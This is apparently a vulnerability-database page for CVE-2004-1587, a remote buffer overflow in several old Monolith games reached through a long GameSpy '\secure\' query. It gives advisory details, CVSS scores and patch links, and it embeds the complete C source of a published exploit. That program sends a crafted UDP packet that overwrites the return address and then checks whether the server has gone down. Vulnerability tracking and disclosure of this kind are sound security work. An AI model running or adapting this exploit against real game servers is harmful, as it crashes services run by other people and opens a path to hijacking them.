ID OSVDB:10635
Type osvdb
Reporter OSVDB
Modified 2004-10-08T04:53:23
Description
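No description provided by the source. The CVE-2004-1587 record reproduced further down this page describes the issue as a buffer overflow in Monolith games (Alien versus Predator 2 1.0.9.6 and earlier, Blood 2 2.1 and earlier, No One Lives Forever 1.004 and earlier, Shogo 2.2 and earlier) that lets a remote attacker crash the application (denial of service) with a long \secure\ Gamespy query. It carries a CVSS v2 base score of 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P). The proof-of-concept text included on this page states that the function's return address is overwritten, so the availability-only rating may understate the impact. The "Other Solution URL" entries below appear to be per-game fix archives hosted on the advisory author's site rather than the vendor's.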
References:
Vendor URL: http://www.lith.com
Security Tracker: 1011603
Secunia Advisory ID: 12776
Other Solution URL: http://aluigi.altervista.org/patches/nolf1004-fix.zip
Other Solution URL: http://aluigi.altervista.org/patches/avp2-1096-fix.zip
Other Solution URL: http://aluigi.altervista.org/patches/blood2-21-fix.zip
Other Solution URL: http://aluigi.altervista.org/patches/shogo22-fix.zip
Other Advisory URL: http://aluigi.altervista.org/adv/lithsec-adv.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-10/0071.html
CVE-2004-1587
{"type": "osvdb", "published": "2004-10-08T04:53:23", "href": "https://vulners.com/osvdb/OSVDB:10635", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/", "score": 5.0}, "viewCount": 1, "edition": 1, "reporter": "OSVDB", "title": "Monolith Multiple Game \\secure\\ Gamespy Query Remote Overflow", "affectedSoftware": [], "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2017-04-28T13:20:06", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-1587"]}, {"type": "exploitdb", "idList": ["EDB-ID:571"]}], "modified": "2017-04-28T13:20:06", "rev": 2}, "vulnersScore": 6.2}, "references": [], "id": "OSVDB:10635", "lastseen": "2017-04-28T13:20:06", "cvelist": ["CVE-2004-1587"], "modified": "2004-10-08T04:53:23", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.lith.com\nSecurity Tracker: 1011603\n[Secunia Advisory ID:12776](https://secuniaresearch.flexerasoftware.com/advisories/12776/)\nOther Solution URL: http://aluigi.altervista.org/patches/nolf1004-fix.zip\nOther Solution URL: http://aluigi.altervista.org/patches/avp2-1096-fix.zip\nOther Solution URL: http://aluigi.altervista.org/patches/blood2-21-fix.zip\nOther Solution URL: http://aluigi.altervista.org/patches/shogo22-fix.zip\nOther Advisory URL: http://aluigi.altervista.org/adv/lithsec-adv.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-10/0071.html\n[CVE-2004-1587](https://vulners.com/cve/CVE-2004-1587)\n"}
{"cve": [{"lastseen": "2020-10-03T11:33:40", "description": "Buffer overflow in Monolith games including (1) Alien versus Predator 2 1.0.9.6 and earlier, (2) Blood 2 2.1 and earlier, (3) No one lives forever 1.004 and earlier and (4) Shogo 2.2 and earlier allows remote attackers to cause a denial of service (application crash) via a long secure Gamespy query.", "edition": 3, "cvss3": {}, "published": "2004-12-31T05:00:00", "title": "CVE-2004-1587", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-1587"], "modified": "2017-07-11T01:31:00", "cpe": ["cpe:/a:monolith_productions:alien_versus_predator:2.1.0.9.6", "cpe:/a:monolith_productions:no_one_lives_forever:1.0.004", "cpe:/a:monolith_productions:blood:2_2.1", "cpe:/a:monolith_productions:shogo:2.2"], "id": "CVE-2004-1587", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1587", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:monolith_productions:blood:2_2.1:*:*:*:*:*:*:*", "cpe:2.3:a:monolith_productions:no_one_lives_forever:1.0.004:*:*:*:*:*:*:*", "cpe:2.3:a:monolith_productions:alien_versus_predator:2.1.0.9.6:*:*:*:*:*:*:*", "cpe:2.3:a:monolith_productions:shogo:2.2:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T12:28:17", "description": "Monolith Games Local Buffer Overflow Exploit. CVE-2004-1587. 
Dos exploit for windows platform", "published": "2004-10-10T00:00:00", "type": "exploitdb", "title": "Monolith Games Local Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-1587"], "modified": "2004-10-10T00:00:00", "id": "EDB-ID:571", "href": "https://www.exploit-db.com/exploits/571/", "sourceData": "/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <net/inet.h>\r\n #include <netdb.h>\r\n#endif\r\n\r\n\r\n\r\n#define VER \"0.1.1\"\r\n#define PORT 27888\r\n#define TIMEOUT 3\r\n#define BUFFSZ 2048\r\n#define PCK \"\\\\secure\\\\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"\\x55\\x44\\x33\\x22\"\r\n /* return address, each byte must be >= 0x20 and <= 0x7f */\r\n\r\n\r\n\r\nvoid gs_info_udp(u_long ip, u_short port);\r\nint timeout(int sock);\r\nu_long resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n int sd;\r\n u_short port = PORT;\r\n struct sockaddr_in peer;\r\n\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"\\\\secure\\\\ buffer overflow in some old Monolith games \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: aluigi@altervista.org\\n\"\r\n \"web: http://aluigi.altervista.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 2) {\r\n printf(\"\\n\"\r\n \"Usage: %s <server> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Vulnerable games Latest versions\\n\"\r\n \" Alien versus predator 2 1.0.9.6\\n\"\r\n \" Blood 2 2.1\\n\"\r\n \" No one lives forever 1.004\\n\"\r\n \" Shogo 2.2\\n\"\r\n \"\\n\"\r\n \"Note: the return address will be overwritten by 0x%08lx\\n\"\r\n \" (only the bytes from 0x20 to 0x7f are allowed)\\n\"\r\n \"\\n\", argv[0], port, 
*(u_long *)(PCK + 72));\r\n exit(1);\r\n }\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n if(argc > 2) port = atoi(argv[2]);\r\n\r\n peer.sin_addr.s_addr = resolv(argv[1]);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target is %s:%hu\\n\\n\",\r\n inet_ntoa(peer.sin_addr), port);\r\n\r\n fputs(\"- Request informations:\\n\", stdout);\r\n gs_info_udp(peer.sin_addr.s_addr, port);\r\n\r\n fputs(\"- Send BOOM packet:\\n\", stdout);\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n if(sendto(sd, PCK, sizeof(PCK) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n close(sd);\r\n\r\n fputs(\"- Check server:\\n\", stdout);\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n if(sendto(sd, \"\\\\status\\\\\", 8, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\nServer IS vulnerable!!!\\n\\n\", stdout);\r\n } else {\r\n fputs(\"\\nServer doesn't seem vulnerable\\n\\n\", stdout);\r\n }\r\n\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nvoid gs_info_udp(u_long ip, u_short port) {\r\n struct sockaddr_in peer;\r\n int sd,\r\n len,\r\n nt = 1;\r\n u_char buff[2048],\r\n *p1,\r\n *p2;\r\n\r\n peer.sin_addr.s_addr = ip;\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n if(sendto(sd, \"\\\\status\\\\\", 8, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\nError: socket timeout, no replies received. 
Probably the server doesn't support the Gamespy query protocol or the port is wrong\\n\\n\", stdout);\r\n close(sd);\r\n exit(1);\r\n }\r\n\r\n len = recvfrom(sd, buff, sizeof(buff) - 1, 0, NULL, NULL);\r\n if(len < 0) std_err();\r\n\r\n buff[len] = 0x00;\r\n p1 = buff;\r\n while((p2 = strchr(p1, '\\\\'))) {\r\n *p2 = 0x00;\r\n\r\n if(!nt) {\r\n if(!*p1) break;\r\n printf(\"%30s: \", p1);\r\n nt++;\r\n } else {\r\n printf(\"%s\\n\", p1);\r\n nt = 0;\r\n }\r\n p1 = p2 + 1;\r\n }\r\n printf(\"%s\\n\\n\", p1);\r\n close(sd);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n int err;\r\n\r\n tout.tv_sec = TIMEOUT;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n err = select(sock + 1, &fd_read, NULL, NULL, &tout);\r\n if(err < 0) std_err();\r\n if(!err) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu_long resolv(char *host) {\r\n struct hostent *hp;\r\n u_long host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u_long *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\n\n// milw0rm.com [2004-10-10]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/571/"}]}